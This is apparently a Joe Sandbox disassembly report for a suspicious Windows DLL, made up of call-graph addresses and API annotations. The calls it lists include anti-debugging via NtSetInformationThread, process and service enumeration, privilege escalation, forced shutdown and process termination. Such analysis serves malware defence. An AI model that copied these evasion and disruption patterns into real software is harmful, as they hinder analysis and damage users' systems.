100804->100840 100832 6c0dbe40 100805->100832 100839 6c0d0120 18 API calls __fassign 100806->100839 100811 6c0dbcfd 100815 6c0dbd26 100811->100815 100816 6c0dbd01 100811->100816 100812 6c0dbd3c 100813 6c0dbd95 WriteFile 100812->100813 100814 6c0dbd50 100812->100814 100817 6c0dbdb9 GetLastError 100813->100817 100813->100822 100819 6c0dbd5b 100814->100819 100820 6c0dbd85 100814->100820 100842 6c0dbeb1 43 API calls 5 library calls 100815->100842 100816->100822 100841 6c0dc25b 6 API calls __wsopen_s 100816->100841 100817->100822 100823 6c0dbd75 100819->100823 100824 6c0dbd60 100819->100824 100845 6c0dc2c3 7 API calls 2 library calls 100820->100845 100822->100799 100844 6c0dc487 8 API calls 3 library calls 100823->100844 100824->100822 100826 6c0dbd65 100824->100826 100843 6c0dc39e 7 API calls 2 library calls 100826->100843 100829 6c0dbd73 100829->100822 100830->100791 100831->100791 100833 6c0e19e5 __wsopen_s 18 API calls 100832->100833 100834 6c0dbe51 100833->100834 100835 6c0dbcf8 100834->100835 100836 6c0d49b2 __Getctype 37 API calls 100834->100836 100835->100811 100835->100812 100837 6c0dbe74 100836->100837 100837->100835 100838 6c0dbe8e GetConsoleMode 100837->100838 100838->100835 100839->100822 100840->100805 100841->100822 100842->100822 100843->100829 100844->100829 100845->100829 100846->100775 100847->100780 100849 6c0db9cd __wsopen_s 100848->100849 100857 6c0e1990 EnterCriticalSection 100849->100857 100851 6c0db9db 100853 6c0dba08 100851->100853 100858 6c0db925 100851->100858 100871 6c0dba41 LeaveCriticalSection __wsopen_s 100853->100871 100855 6c0dba2a 100855->100782 100856->100782 100857->100851 100872 6c0e15a2 100858->100872 100860 6c0db935 100861 6c0db93b 100860->100861 100864 6c0e15a2 __wsopen_s 18 API calls 100860->100864 100870 6c0db96d 100860->100870 100877 6c0e171f SetStdHandle __dosmaperr __wsopen_s 100861->100877 100863 6c0db993 __dosmaperr 100863->100853 100866 6c0db964 100864->100866 100865 6c0e15a2 __wsopen_s 18 API calls 100867 6c0db979 CloseHandle 100865->100867 100868 6c0e15a2 __wsopen_s 18 API calls 100866->100868 100867->100861 100869 6c0db985 GetLastError 100867->100869 100868->100870 100869->100861 100870->100861 100870->100865 100871->100855 100874 6c0e15c4 __dosmaperr 100872->100874 100875 6c0e15af __dosmaperr 100872->100875 100873 6c0e15e9 100873->100860 100874->100873 100876 6c0d0120 __fassign 18 API calls 100874->100876 100875->100860 100876->100875 100877->100863 100878->100471 100879->100473 100880->100475 100882 6c0c65dc 100881->100882 100883 6c0c6608 100881->100883 100886 6c0c6601 100882->100886 100904 6bf92250 30 API calls 100882->100904 100885 6c0c6619 100883->100885 100902 6bf93560 32 API calls std::_Xinvalid_argument 100883->100902 100885->100886 100903 6bf92f60 42 API calls 4 library calls 100885->100903 100886->100484 100888 6c0c67e8 100905 6bf92340 24 API calls 100888->100905 100890 6c0c67f7 100906 6c0c9379 RaiseException 100890->100906 100894 6c0c6827 100908 6bf92340 24 API calls 100894->100908 100896 6c0c683d 100909 6c0c9379 RaiseException 100896->100909 100898 6c0c6653 100898->100886 100907 6bf92250 30 API calls 100898->100907 100899->100484 100900->100484 100901->100484 100902->100885 100903->100898 100904->100888 100905->100890 100906->100898 100907->100894 100908->100896 100909->100886 100910->100490 100911->100492 100912->100490 100913->100490 100914->100490 100916 6bf9022e 100915->100916 100917 6bf904d6 100916->100917 100922 6c0d17db 100916->100922 100917->100503 100919->100504 100920->100506 100921->100508 100923 6c0d1806 100922->100923 100924 6c0d17e9 100922->100924 100923->100916 100924->100923 100925 6c0d180a 100924->100925 100926 6c0d17f6 100924->100926 100930 6c0d1a02 100925->100930 100938 6c0d0120 18 API calls __fassign 100926->100938 100931 6c0d1a0e __wsopen_s 100930->100931 100939 6c0cc5a9 EnterCriticalSection 100931->100939 100933 6c0d1a1c 100940 6c0d19bf 100933->100940 100937 6c0d183c 100937->100916 100938->100923 100939->100933 100948 6c0d85a6 100940->100948 100946 6c0d19f9 100947 6c0d1a51 LeaveCriticalSection 100946->100947 100947->100937 100949 6c0d9c60 18 API calls 100948->100949 100950 6c0d85b7 100949->100950 100965 6c0e19e5 100950->100965 100952 6c0d85bd __wsopen_s 100953 6c0d19d3 100952->100953 100970 6c0d47bb HeapFree GetLastError __dosmaperr 100952->100970 100955 6c0d183e 100953->100955 100956 6c0d1850 100955->100956 100959 6c0d186e 100955->100959 100957 6c0d185e 100956->100957 100956->100959 100962 6c0d1886 _Yarn 100956->100962 100972 6c0d0120 18 API calls __fassign 100957->100972 100964 6c0d8659 62 API calls 100959->100964 100960 6c0d0cb9 62 API calls 100960->100962 100961 6c0d9c60 18 API calls 100961->100962 100962->100959 100962->100960 100962->100961 100963 6c0dbb6c __wsopen_s 62 API calls 100962->100963 100963->100962 100964->100946 100966 6c0e19f2 100965->100966 100968 6c0e19ff 100965->100968 100966->100952 100967 6c0e1a0b 100967->100952 100968->100967 100971 6c0d0120 18 API calls __fassign 100968->100971 100970->100953 100971->100966 100972->100959 100973->100525 100974->100527 100975->100529 100976->100425 100977->100433 100978->100435 100979->100428 100980->100431 100981 6c0cef3f 100982 6c0cef4b __wsopen_s 100981->100982 100983 6c0cef5f 100982->100983 100984 6c0cef52 GetLastError ExitThread 100982->100984 100993 6c0d49b2 GetLastError 100983->100993 100989 6c0cef7b 101026 6c0ceeaa 16 API calls 2 library calls 100989->101026 100992 6c0cef9d 100994 6c0d49c9 100993->100994 100995 6c0d49cf 100993->100995 101027 6c0d6b23 6 API calls std::_Lockit::_Lockit 100994->101027 100999 6c0d49d5 SetLastError 100995->100999 101028 6c0d6b62 6 API calls std::_Lockit::_Lockit 100995->101028 100998 6c0d49ed 100998->100999 101000 6c0d49f1 100998->101000 101006 6c0d4a69 100999->101006 101007 6c0cef64 100999->101007 101029 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 101000->101029 101002 6c0d49fd 101004 6c0d4a1c 101002->101004 101005 6c0d4a05 101002->101005 101032 6c0d6b62 6 API calls std::_Lockit::_Lockit 101004->101032 101030 6c0d6b62 6 API calls std::_Lockit::_Lockit 101005->101030 101035 6c0d0ac9 37 API calls std::locale::_Setgloballocale 101006->101035 101020 6c0d9d66 101007->101020 101011 6c0d4a13 101031 6c0d47bb HeapFree GetLastError __dosmaperr 101011->101031 101013 6c0d4a28 101014 6c0d4a3d 101013->101014 101015 6c0d4a2c 101013->101015 101034 6c0d47bb HeapFree GetLastError __dosmaperr 101014->101034 101033 6c0d6b62 6 API calls std::_Lockit::_Lockit 101015->101033 101018 6c0d4a19 101018->100999 101021 6c0d9d78 GetPEB 101020->101021 101022 6c0cef6f 101020->101022 101021->101022 101023 6c0d9d8b 101021->101023 101022->100989 101025 6c0d6d6f 5 API calls std::_Lockit::_Lockit 101022->101025 101036 6c0d6e18 5 API calls std::_Lockit::_Lockit 101023->101036 101025->100989 101026->100992 101027->100995 101028->100998 101029->101002 101030->101011 101031->101018 101032->101013 101033->101011 101034->101018 101036->101022 101037 6bf43d62 101039 6bf43bc0 101037->101039 101038 6bf43e8a GetCurrentThread NtSetInformationThread 101040 6bf43eea 101038->101040 101039->101038 101041 6bf5f8a3 101043 6bf5f887 101041->101043 101042 6bf602ac GetCurrentProcess TerminateProcess 101044 6bf602ca 101042->101044 101043->101042 101045 6bf53b72 101046 6c0c6a43 std::_Facet_Register 4 API calls 101045->101046 101048 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101046->101048 101047 6c0baec0 FindFirstFileA 101047->101048 101048->101047 101050 6bf66ba0 104 API calls 101048->101050 101052 6bf67090 77 API calls 101048->101052 101053 6bf8e010 67 API calls 101048->101053 101054 6bf6639e 101048->101054 101058 6bf66e60 101048->101058 101050->101048 101052->101048 101053->101048 101068 6c0d0130 18 API calls 2 library calls 101054->101068 101059 6bf66e9f 101058->101059 101060 6bf66eb3 101059->101060 101069 6bf93560 32 API calls std::_Xinvalid_argument 101059->101069 101063 6bf66f5b 101060->101063 101071 6bf92250 30 API calls 101060->101071 101072 6bf926e0 24 API calls 4 library calls 101060->101072 101073 6c0c9379 RaiseException 101060->101073 101065 6bf66f6e 101063->101065 101070 6bf937e0 32 API calls std::_Xinvalid_argument 101063->101070 101065->101048 101069->101060 101070->101065 101071->101060 101072->101060 101073->101060 101074 6bf44b53 101075 6c0c6a43 std::_Facet_Register 4 API calls 101074->101075 101076 6bf44b5c _Yarn 101075->101076 101077 6c0baec0 FindFirstFileA 101076->101077 101082 6bf44bae std::ios_base::_Ios_base_dtor 101077->101082 101078 6bf6639e 101255 6c0d0130 18 API calls 2 library calls 101078->101255 101080 6bf44cff 101081 6bf45164 CreateFileA CloseHandle 101086 6bf451ec 101081->101086 101082->101078 101082->101080 101082->101081 101083 6bf5245a _Yarn _strlen 101082->101083 101083->101078 101085 6c0baec0 FindFirstFileA 101083->101085 101100 6bf52a83 std::ios_base::_Ios_base_dtor 101085->101100 101232 6c0c5120 OpenSCManagerA 101086->101232 101088 6bf4fc00 101248 6c0c5240 CreateToolhelp32Snapshot 101088->101248 101091 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101127 6bf45478 std::ios_base::_Ios_base_dtor _Yarn _strlen 101091->101127 101093 6c0baec0 FindFirstFileA 101093->101127 101094 6bf537d0 Sleep 101138 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101094->101138 101095 6bf663b2 101256 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 101095->101256 101096 6c0c5240 4 API calls 101117 6bf5053a 101096->101117 101097 6c0c5240 4 API calls 101119 6bf512e2 101097->101119 101099 6bf4ffe3 101099->101096 101105 6bf50abc 101099->101105 101100->101078 101236 6c0b0390 101100->101236 101101 6bf664f8 101102 6bf66ba0 104 API calls 101102->101127 101103 6bf66e60 32 API calls 101103->101127 101105->101083 101105->101097 101106 6bf67090 77 API calls 101106->101127 101107 6c0c5240 4 API calls 101107->101105 101108 6c0c5240 4 API calls 101124 6bf51dd9 101108->101124 101109 6bf5211c 101109->101083 101110 6bf5241a 101109->101110 101113 6c0b0390 11 API calls 101110->101113 101111 6c0baec0 FindFirstFileA 101111->101138 101112 6bf8e010 67 API calls 101112->101127 101115 6bf5244d 101113->101115 101114 6bf46722 101245 6c0c1880 25 API calls 4 library calls 101114->101245 101254 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101115->101254 101117->101105 101117->101107 101118 6bf52452 Sleep 101118->101083 101119->101108 101119->101109 101131 6bf516ac 101119->101131 101120 6bf46162 101121 6bf4740b 101122 6c0c4ff0 4 API calls 101121->101122 101130 6bf4775a _strlen 101122->101130 101123 6c0c5240 4 API calls 101123->101109 101124->101109 101124->101123 101125 6bf66ba0 104 API calls 101125->101138 101126 6bf66e60 32 API calls 101126->101138 101127->101078 101127->101088 101127->101091 101127->101093 101127->101102 101127->101103 101127->101106 101127->101112 101127->101114 101127->101120 101128 6bf67090 77 API calls 101128->101138 101129 6bf8e010 67 API calls 101129->101138 101130->101078 101132 6bf47b92 101130->101132 101133 6bf47ba9 101130->101133 101136 6bf47b43 _Yarn 101130->101136 101134 6c0c6a43 std::_Facet_Register 4 API calls 101132->101134 101135 6c0c6a43 std::_Facet_Register 4 API calls 101133->101135 101134->101136 101135->101136 101137 6c0baec0 FindFirstFileA 101136->101137 101147 6bf47be7 std::ios_base::_Ios_base_dtor 101137->101147 101138->101078 101138->101111 101138->101125 101138->101126 101138->101128 101138->101129 101139 6c0c4ff0 4 API calls 101150 6bf48a07 101139->101150 101140 6bf49d7f 101144 6c0c6a43 std::_Facet_Register 4 API calls 101140->101144 101141 6bf49d68 101143 6c0c6a43 std::_Facet_Register 4 API calls 101141->101143 101142 6bf4962c _strlen 101142->101078 101142->101140 101142->101141 101145 6bf49d18 _Yarn 101142->101145 101143->101145 101144->101145 101146 6c0baec0 FindFirstFileA 101145->101146 101153 6bf49dbd std::ios_base::_Ios_base_dtor 101146->101153 101147->101078 101147->101139 101147->101142 101148 6bf48387 101147->101148 101149 6c0c4ff0 4 API calls 101158 6bf49120 101149->101158 101150->101149 101151 6c0c4ff0 4 API calls 101168 6bf4a215 _strlen 101151->101168 101152 6c0c4ff0 4 API calls 101155 6bf49624 101152->101155 101153->101078 101153->101151 101161 6bf4e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101153->101161 101154 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101154->101161 101246 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101155->101246 101157 6c0baec0 FindFirstFileA 101157->101161 101158->101152 101159 6bf4f7b1 101247 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101159->101247 101160 6bf4ed02 Sleep 101180 6bf4e8c1 101160->101180 101161->101078 101161->101154 101161->101157 101161->101159 101161->101160 101163 6bf4e8dd GetCurrentProcess TerminateProcess 101163->101161 101164 6bf4a9a4 101166 6c0c6a43 std::_Facet_Register 4 API calls 101164->101166 101165 6bf4a9bb 101167 6c0c6a43 std::_Facet_Register 4 API calls 101165->101167 101175 6bf4a953 _Yarn _strlen 101166->101175 101167->101175 101168->101078 101168->101164 101168->101165 101168->101175 101169 6c0c4ff0 4 API calls 101169->101180 101170 6bf4fbb8 101172 6bf4fbe8 ExitWindowsEx Sleep 101170->101172 101171 6bf4f7c0 101171->101170 101172->101088 101173 6bf4aff0 101176 6c0c6a43 std::_Facet_Register 4 API calls 101173->101176 101174 6bf4b009 101177 6c0c6a43 std::_Facet_Register 4 API calls 101174->101177 101175->101095 101175->101173 101175->101174 101178 6bf4afa0 _Yarn 101175->101178 101176->101178 101177->101178 101179 6c0c5960 104 API calls 101178->101179 101181 6bf4b059 std::ios_base::_Ios_base_dtor _strlen 101179->101181 101180->101161 101180->101163 101180->101169 101181->101078 101182 6bf4b443 101181->101182 101183 6bf4b42c 101181->101183 101186 6bf4b3da _Yarn _strlen 101181->101186 101185 6c0c6a43 std::_Facet_Register 4 API calls 101182->101185 101184 6c0c6a43 std::_Facet_Register 4 API calls 101183->101184 101184->101186 101185->101186 101186->101095 101187 6bf4b7b7 101186->101187 101188 6bf4b79e 101186->101188 101191 6bf4b751 _Yarn 101186->101191 101190 6c0c6a43 std::_Facet_Register 4 API calls 101187->101190 101189 6c0c6a43 std::_Facet_Register 4 API calls 101188->101189 101189->101191 101190->101191 101192 6c0c5960 104 API calls 101191->101192 101193 6bf4b804 std::ios_base::_Ios_base_dtor _strlen 101192->101193 101193->101078 101194 6bf4bc26 101193->101194 101195 6bf4bc0f 101193->101195 101198 6bf4bbbd _Yarn _strlen 101193->101198 101197 6c0c6a43 std::_Facet_Register 4 API calls 101194->101197 101196 6c0c6a43 std::_Facet_Register 4 API calls 101195->101196 101196->101198 101197->101198 101198->101095 101199 6bf4c075 101198->101199 101200 6bf4c08e 101198->101200 101203 6bf4c028 _Yarn 101198->101203 101201 6c0c6a43 std::_Facet_Register 4 API calls 101199->101201 101202 6c0c6a43 std::_Facet_Register 4 API calls 101200->101202 101201->101203 101202->101203 101204 6c0c5960 104 API calls 101203->101204 101209 6bf4c0db std::ios_base::_Ios_base_dtor _strlen 101204->101209 101205 6bf4c7a5 101207 6c0c6a43 std::_Facet_Register 4 API calls 101205->101207 101206 6bf4c7bc 101208 6c0c6a43 std::_Facet_Register 4 API calls 101206->101208 101216 6bf4c753 _Yarn _strlen 101207->101216 101208->101216 101209->101078 101209->101205 101209->101206 101209->101216 101210 6bf4d406 101213 6c0c6a43 std::_Facet_Register 4 API calls 101210->101213 101211 6bf4d3ed 101212 6c0c6a43 std::_Facet_Register 4 API calls 101211->101212 101214 6bf4d39a _Yarn 101212->101214 101213->101214 101215 6c0c5960 104 API calls 101214->101215 101217 6bf4d458 std::ios_base::_Ios_base_dtor _strlen 101215->101217 101216->101095 101216->101210 101216->101211 101216->101214 101222 6bf4cb2f 101216->101222 101217->101078 101218 6bf4d8a4 101217->101218 101219 6bf4d8bb 101217->101219 101223 6bf4d852 _Yarn _strlen 101217->101223 101220 6c0c6a43 std::_Facet_Register 4 API calls 101218->101220 101221 6c0c6a43 std::_Facet_Register 4 API calls 101219->101221 101220->101223 101221->101223 101223->101095 101224 6bf4dcb6 101223->101224 101225 6bf4dccf 101223->101225 101228 6bf4dc69 _Yarn 101223->101228 101227 6c0c6a43 std::_Facet_Register 4 API calls 101224->101227 101226 6c0c6a43 std::_Facet_Register 4 API calls 101225->101226 101226->101228 101227->101228 101229 6c0c5960 104 API calls 101228->101229 101231 6bf4dd1c std::ios_base::_Ios_base_dtor 101229->101231 101230 6c0c4ff0 4 API calls 101230->101161 101231->101078 101231->101230 101233 6c0c5156 101232->101233 101234 6c0c51e8 OpenServiceA 101233->101234 101235 6c0c522f 101233->101235 101234->101233 101235->101127 101242 6c0b03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101236->101242 101237 6c0b310e CloseHandle 101237->101242 101238 6c0b3f5f CloseHandle 101238->101242 101239 6c0b251b CloseHandle 101239->101242 101240 6bf537cb 101244 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101240->101244 101241 6c09c1e0 WriteFile WriteFile WriteFile ReadFile 101241->101242 101242->101237 101242->101238 101242->101239 101242->101240 101242->101241 101257 6c09b730 101242->101257 101244->101094 101245->101121 101246->101142 101247->101171 101249 6c0c52a0 std::locale::_Setgloballocale 101248->101249 101250 6c0c5277 CloseHandle 101249->101250 101251 6c0c5320 Process32NextW 101249->101251 101252 6c0c53b1 101249->101252 101253 6c0c5345 Process32FirstW 101249->101253 101250->101249 101251->101249 101252->101099 101253->101249 101254->101118 101256->101101 101258 6c09b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101257->101258 101259 6c09c180 101258->101259 101260 6c09bced CreateFileA 101258->101260 101262 6c09aa30 101258->101262 101259->101242 101260->101258 101265 6c09aa43 __wsopen_s std::locale::_Setgloballocale 101262->101265 101263 6c09b43d WriteFile 101263->101265 101264 6c09b3e9 WriteFile 101264->101265 101265->101263 101265->101264 101266 6c09b718 101265->101266 101267 6c09ab95 ReadFile 101265->101267 101266->101258 101267->101265 101268 6c0dcad3 101269 6c0dcae5 __dosmaperr 101268->101269 101270 6c0dcafd 101268->101270 101270->101269 101271 6c0dcb48 __dosmaperr 101270->101271 101272 6c0dcb77 101270->101272 101310 6c0d0120 18 API calls __fassign 101271->101310 101274 6c0dcb90 101272->101274 101276 6c0dcbe7 __wsopen_s 101272->101276 101277 6c0dcbab __dosmaperr 101272->101277 101274->101277 101295 6c0dcb95 101274->101295 101275 6c0e19e5 __wsopen_s 18 API calls 101278 6c0dcd3e 101275->101278 101304 6c0d47bb HeapFree GetLastError __dosmaperr 101276->101304 101303 6c0d0120 18 API calls __fassign 101277->101303 101281 6c0dcdb4 101278->101281 101284 6c0dcd57 GetConsoleMode 101278->101284 101283 6c0dcdb8 ReadFile 101281->101283 101282 6c0dcc07 101305 6c0d47bb HeapFree GetLastError __dosmaperr 101282->101305 101286 6c0dce2c GetLastError 101283->101286 101287 6c0dcdd2 101283->101287 101284->101281 101288 6c0dcd68 101284->101288 101300 6c0dcbc2 __dosmaperr __wsopen_s 101286->101300 101287->101286 101290 6c0dcda9 101287->101290 101288->101283 101291 6c0dcd6e ReadConsoleW 101288->101291 101289 6c0dcc0e 101289->101300 101306 6c0dac69 20 API calls __wsopen_s 101289->101306 101296 6c0dce0e 101290->101296 101297 6c0dcdf7 101290->101297 101290->101300 101291->101290 101293 6c0dcd8a GetLastError 101291->101293 101293->101300 101295->101275 101299 6c0dce25 101296->101299 101296->101300 101308 6c0dcefe 23 API calls 3 library calls 101297->101308 101309 6c0dd1b6 21 API calls __wsopen_s 101299->101309 101307 6c0d47bb HeapFree GetLastError __dosmaperr 101300->101307 101302 6c0dce2a 101302->101300 101303->101300 101304->101282 101305->101289 101306->101295 101307->101269 101308->101300 101309->101302 101310->101269
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: HR^
                                        • API String ID: 4218353326-1341859651
                                        • Opcode ID: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                        • Instruction ID: 0a9c14aa832a8132d31c36b64bce4402c97426ecbcb0784fced2367b4b5edb65
                                        • Opcode Fuzzy Hash: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                        • Instruction Fuzzy Hash: 0B74D873644B018FC728CF28C8D0695B7F3EF953147198A6DC09A8B766EB78B54ACB50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: }jk$;T55$L@^
                                        • API String ID: 0-4218709813
                                        • Opcode ID: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                        • Instruction ID: 0687526a43a6179a4fe510fae3504aa0e3687840b62221c0f24ec427030f930b
                                        • Opcode Fuzzy Hash: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                        • Instruction Fuzzy Hash: 553418736447018FC728CF28C8D0A95B7E3EFA5314B198A6DC0E64B765EB38B55ACB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7677 6c0c5240-6c0c5275 CreateToolhelp32Snapshot 7678 6c0c52a0-6c0c52a9 7677->7678 7679 6c0c52ab-6c0c52b0 7678->7679 7680 6c0c52e0-6c0c52e5 7678->7680 7681 6c0c5315-6c0c531a 7679->7681 7682 6c0c52b2-6c0c52b7 7679->7682 7683 6c0c52eb-6c0c52f0 7680->7683 7684 6c0c5377-6c0c53a1 call 6c0d2c05 7680->7684 7690 6c0c53a6-6c0c53ab 7681->7690 7691 6c0c5320-6c0c5332 Process32NextW 7681->7691 7686 6c0c52b9-6c0c52be 7682->7686 7687 6c0c5334-6c0c535d call 6c0cb920 Process32FirstW 7682->7687 7688 6c0c5277-6c0c5292 CloseHandle 7683->7688 7689 6c0c52f2-6c0c52f7 7683->7689 7684->7678 7686->7678 7693 6c0c52c0-6c0c52d1 7686->7693 7697 6c0c5362-6c0c5372 7687->7697 7688->7678 7689->7678 7695 6c0c52f9-6c0c5313 7689->7695 7690->7678 7694 6c0c53b1-6c0c53bf 7690->7694 7691->7697 7693->7678 7695->7678 7697->7678
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0C524E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3332741929-0
                                        • Opcode ID: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                        • Instruction ID: 9df2e85a24ed6d71813130110880076a77d390e34ee64ce851a09314e2004afe
                                        • Opcode Fuzzy Hash: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                        • Instruction Fuzzy Hash: 5F314978608300AFD7109F28C888B1EBBF4AF9A744F90492EF598C7360D3719848AB53

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7821 6bf43886-6bf4388e 7822 6bf43894-6bf43896 7821->7822 7823 6bf43970-6bf4397d 7821->7823 7822->7823 7824 6bf4389c-6bf438b9 7822->7824 7825 6bf439f1-6bf439f8 7823->7825 7826 6bf4397f-6bf43989 7823->7826 7827 6bf438c0-6bf438c1 7824->7827 7829 6bf43ab5-6bf43aba 7825->7829 7830 6bf439fe-6bf43a03 7825->7830 7826->7824 7828 6bf4398f-6bf43994 7826->7828 7831 6bf4395e 7827->7831 7833 6bf43b16-6bf43b18 7828->7833 7834 6bf4399a-6bf4399f 7828->7834 7829->7824 7832 6bf43ac0-6bf43ac7 7829->7832 7835 6bf438d2-6bf438d4 7830->7835 7836 6bf43a09-6bf43a2f 7830->7836 7839 6bf43960-6bf43964 7831->7839 7832->7827 7838 6bf43acd-6bf43ad6 7832->7838 7833->7827 7840 6bf439a5-6bf439bf 7834->7840 7841 6bf4383b-6bf43855 call 6c091470 call 6c091480 7834->7841 7837 6bf43957-6bf4395c 7835->7837 7842 6bf43a35-6bf43a3a 7836->7842 7843 6bf438f8-6bf43955 7836->7843 7837->7831 7838->7833 7848 6bf43ad8-6bf43aeb 7838->7848 7846 6bf43860-6bf43885 7839->7846 7847 6bf4396a 7839->7847 7850 6bf43a5a-6bf43a5d 7840->7850 7841->7846 7844 6bf43a40-6bf43a57 7842->7844 7845 6bf43b1d-6bf43b22 7842->7845 7843->7837 7844->7850 7856 6bf43b24-6bf43b44 7845->7856 7857 6bf43b49-6bf43b50 7845->7857 7846->7821 7851 6bf43ba1-6bf43bb6 7847->7851 7848->7843 7854 6bf43af1-6bf43af8 7848->7854 7852 6bf43a87-6bf43aa7 7850->7852 7853 6bf43aa9-6bf43ab0 7850->7853 7859 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7851->7859 7852->7853 7853->7839 7860 6bf43b62-6bf43b85 7854->7860 7861 6bf43afa-6bf43aff 7854->7861 7856->7852 7857->7827 7863 6bf43b56-6bf43b5d 7857->7863 7872 6bf43be0-6bf43bfe 7859->7872 7860->7843 7868 6bf43b8b 7860->7868 7861->7837 7863->7839 7868->7851 7875 6bf43c04-6bf43c11 7872->7875 7876 6bf43e7b 7872->7876 7878 6bf43c17-6bf43c20 7875->7878 7879 6bf43ce0-6bf43cea 7875->7879 7877 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 7876->7877 7897 6bf43eea-6bf43f04 call 6c091470 call 6c091480 7877->7897 7880 6bf43dc5 7878->7880 7881 6bf43c26-6bf43c2d 7878->7881 7882 6bf43cec-6bf43d0c 7879->7882 7883 6bf43d3a-6bf43d3c 7879->7883 7891 6bf43dc6 7880->7891 7885 6bf43dc3 7881->7885 7886 6bf43c33-6bf43c3a 7881->7886 7887 6bf43d90-6bf43d95 7882->7887 7888 6bf43d70-6bf43d8d 7883->7888 7889 6bf43d3e-6bf43d45 7883->7889 7885->7880 7892 6bf43e26-6bf43e2b 7886->7892 7893 6bf43c40-6bf43c5b 7886->7893 7895 6bf43d97-6bf43db8 7887->7895 7896 6bf43dba-6bf43dc1 7887->7896 7888->7887 7894 6bf43d50-6bf43d57 7889->7894 7898 6bf43dc8-6bf43dcc 7891->7898 7899 6bf43e31 7892->7899 7900 6bf43c7b-6bf43cd0 7892->7900 7901 6bf43e1b-6bf43e24 7893->7901 7894->7891 7895->7880 7896->7885 7903 6bf43dd7-6bf43ddc 7896->7903 7915 6bf43f75-6bf43fa1 7897->7915 7898->7872 7902 6bf43dd2 